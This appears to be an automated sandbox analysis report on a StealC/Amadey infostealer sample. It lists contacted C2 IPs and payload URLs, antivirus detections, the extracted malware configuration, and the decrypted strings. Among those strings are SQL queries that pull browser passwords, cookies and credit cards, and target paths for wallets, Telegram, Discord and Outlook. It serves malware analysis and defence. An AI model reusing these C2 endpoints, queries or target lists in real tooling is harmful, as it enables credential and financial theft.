Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
172.217.17.78	plus.l.google.com	United States	15169	GOOGLEUS	false
142.250.181.142	www3.l.google.com	United States	15169	GOOGLEUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
142.250.181.100	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true

Private

IP
192.168.2.8
127.0.0.1

Contacted Domains

Name	IP	Active
atten-supporse.biz	172.67.165.166	true
www3.l.google.com	142.250.181.142	true
plus.l.google.com	172.217.17.78	true
play.google.com	172.217.19.206	true
www.google.com	142.250.181.100	true
ogs.google.com	unknown	unknown
apis.google.com	unknown	unknown

Contacted URLs

Name	Malicious	Reputation
http://185.215.113.206/68b591d6548ec281/softokn3.dll	false	high
http://185.215.113.206/68b591d6548ec281/vcruntime140.dll	false	high
http://185.215.113.206/	false	high
http://185.215.113.16/mine/random.exe	false	high
http://185.215.113.206/68b591d6548ec281/sqlite3.dll	false	high
http://185.215.113.43/Zu7JuNko/index.php	false	high
http://185.215.113.206/68b591d6548ec281/freebl3.dll	false	high
http://185.215.113.206/68b591d6548ec281/nss3.dll	false	high
http://185.215.113.206/68b591d6548ec281/mozglue.dll	false	high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false	high
http://185.215.113.206/68b591d6548ec281/msvcp140.dll	false	high
http://185.215.113.206/c4becf79229cb002.php	false	high
https://www.google.com/async/newtab_promos	false	high
https://www.google.com/async/ddljson?async=ntp:2	false	high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false	high

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.206/c4becf79229cb002.phpLy	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/sqlite3.dllk	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dll.	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/mozglue.dllu	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php423177b60194262422f8d727cf88	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpDI	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000011.00000002.2037822618.0000000000A11000.00000040.00000001.01000000.0000000E.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0.2.file.exe.3a0000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "drum"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe	ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: 07
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: 01
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: 20
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: 25
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetProcAddress
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: LoadLibraryA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: lstrcatA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: OpenEventA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CreateEventA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CloseHandle
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Sleep
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: VirtualFree
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetSystemInfo
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: VirtualAlloc
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: HeapAlloc
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetComputerNameA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: lstrcpyA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetProcessHeap
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetCurrentProcess
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: lstrlenA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: ExitProcess
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetSystemTime
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: advapi32.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: gdi32.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: user32.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: crypt32.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetUserNameA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CreateDCA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetDeviceCaps
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: ReleaseDC
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: sscanf
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: VMwareVMware
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: HAL9TH
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: JohnDoe
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: DISPLAY
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: http://185.215.113.206
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: /c4becf79229cb002.php
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: /68b591d6548ec281/
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: drum
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetFileAttributesA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: HeapFree
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetFileSize
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GlobalSize
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: IsWow64Process
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Process32Next
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetLocalTime
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: FreeLibrary
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Process32First
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: DeleteFileA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: FindNextFileA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: LocalFree
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: FindClose
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: LocalAlloc
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetFileSizeEx
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: ReadFile
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SetFilePointer
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: WriteFile
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CreateFileA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: FindFirstFileA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CopyFileA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: VirtualProtect
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetLastError
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: lstrcpynA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GlobalFree
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GlobalAlloc
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: OpenProcess
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: TerminateProcess
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: gdiplus.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: ole32.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: bcrypt.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: wininet.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: shlwapi.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: shell32.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SelectObject
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: BitBlt
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: DeleteObject
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GdiplusStartup
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GdiplusShutdown
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GdipDisposeImage
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GdipFree
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CoUninitialize
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CoInitialize
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CoCreateInstance
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: BCryptDecrypt
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: BCryptSetProperty
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetWindowRect
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetDesktopWindow
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetDC
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CloseWindow
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: wsprintfA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CharToOemW
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: wsprintfW
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: RegQueryValueExA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: RegCloseKey
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: RegEnumValueA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CryptUnprotectData
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: ShellExecuteExA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: InternetConnectA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: InternetCloseHandle
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: HttpSendRequestA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: InternetReadFile
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: StrCmpCA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: StrStrA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: StrCmpCW
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: PathMatchSpecA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: RmStartSession
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: RmRegisterResources
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: RmGetList
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: RmEndSession
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: sqlite3_open
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: sqlite3_step
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: sqlite3_column_text
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: sqlite3_finalize
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: sqlite3_close
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: encrypted_key
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: PATH
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: NSS_Init
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: NSS_Shutdown
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: PK11_Authenticate
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: C:\ProgramData\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: browser:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: profile:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: url:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: login:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: password:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Opera
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: OperaGX
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Network
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: cookies
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: .txt
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: TRUE
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: FALSE
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: autofill
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: history
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: cc
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: name:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: month:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: year:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: card:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Cookies
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Login Data
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Web Data
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: History
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: logins.json
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: formSubmitURL
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: usernameField
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: encryptedUsername
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: encryptedPassword
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: guid
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: cookies.sqlite
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: formhistory.sqlite
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: places.sqlite
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: plugins
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Local Extension Settings
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Sync Extension Settings
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: IndexedDB
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Opera Stable
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Opera GX Stable
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CURRENT
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: chrome-extension_
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Local State
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: profiles.ini
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: chrome
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: opera
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: firefox
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: wallets
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: ProductName
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: x32
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: x64
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: DisplayName
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: DisplayVersion
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Network Info:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - IP: IP?
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Country: ISO?
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: System Summary:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - HWID:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - OS:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Architecture:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - UserName:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Computer Name:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Local Time:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - UTC:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Language:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Keyboards:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Laptop:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Running Path:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - CPU:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Threads:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Cores:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - RAM:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Display Resolution:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - GPU:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: User Agents:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Installed Apps:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: All Users:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Current User:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Process List:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: system_info.txt
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: freebl3.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: mozglue.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: msvcp140.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: nss3.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: softokn3.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: vcruntime140.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: \Temp\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: .exe
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: runas
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: open
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: /c start
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: %DESKTOP%
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: %APPDATA%
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: %USERPROFILE%
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: %RECENT%
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: *.lnk
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: files
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: \discord\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: key_datas
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: map*
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Telegram
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Tox
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: *.tox
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: *.ini
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Password
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: 00000001
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: 00000002
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: 00000003
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: 00000004
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Pidgin
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: \.purple\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: accounts.xml
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: dQw4w9WgXcQ
